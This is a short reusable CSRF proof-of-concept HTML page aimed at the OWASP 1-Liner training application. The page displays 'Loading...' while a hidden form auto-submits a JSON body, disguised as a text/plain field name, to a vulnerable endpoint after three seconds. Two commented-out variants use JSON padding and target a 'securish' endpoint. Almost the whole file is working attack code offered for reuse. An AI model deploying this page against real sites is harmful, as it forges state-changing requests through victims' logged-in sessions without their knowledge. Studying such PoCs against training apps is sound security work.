CSRF PoC Example that can be reused. Automatically POSTs a JSON string to a server after a short delay.

csrf_json_hidden.html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
  <head>
    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
    <script type="text/javascript">$(document).ready(function (){
        setTimeout("$('#target').submit()", 3000);
      });</script>
  </head>
  <body>
    <h1>Loading...</h1>
    
    <!-- CSRF POST to /vulnerable using JSON commenting, works with Jackson that's used in OWASP 1-Liner -->
    <form id="target" enctype="text/plain" method="POST" action="http://local.1-liner.org/oneliner/ws/vulnerable/oneliners" style="visibility:hidden">
      <input type="text" name='{"id": 0, "nickName": "John", "oneLiner": "I hate OWASP!", "timestamp": "20111006"}//' value="dummy" />
      <input type="submit" value="Go" />
    </form>

    <!-- CSRF POST to /vulnerable using JSON padding, does not work with Jackson that's used in OWASP 1-Liner -->
    <!--
    <form id="target" enctype="text/plain" method="POST" action="http://local.1-liner.org/oneliner/ws/vulnerable/oneliners" style="visibility:hidden">
    <input type="text" name='{"id": 0, "nickName": "John", "oneLiner": "I hate OWASP!", "timestamp": "20111006", "paddingDummy": "' value='"}' />
    <input type="submit" value="Go" />
    </form>
    -->
    <!-- CSRF POST to /securish -->
    <!--
    <form id="target" enctype="text/plain" method="POST" action="http://local.1-liner.org/oneliner/ws/securish/oneliners" style="visibility:hidden">
    <input type="text" name='{"id": 0, "nickName": "John", "oneLiner": "I hate OWASP!", "timestamp": "20111006"}//' value="dummy" />
    <input type="submit" value="Go" />
    </form>
    -->
  </body>
</html>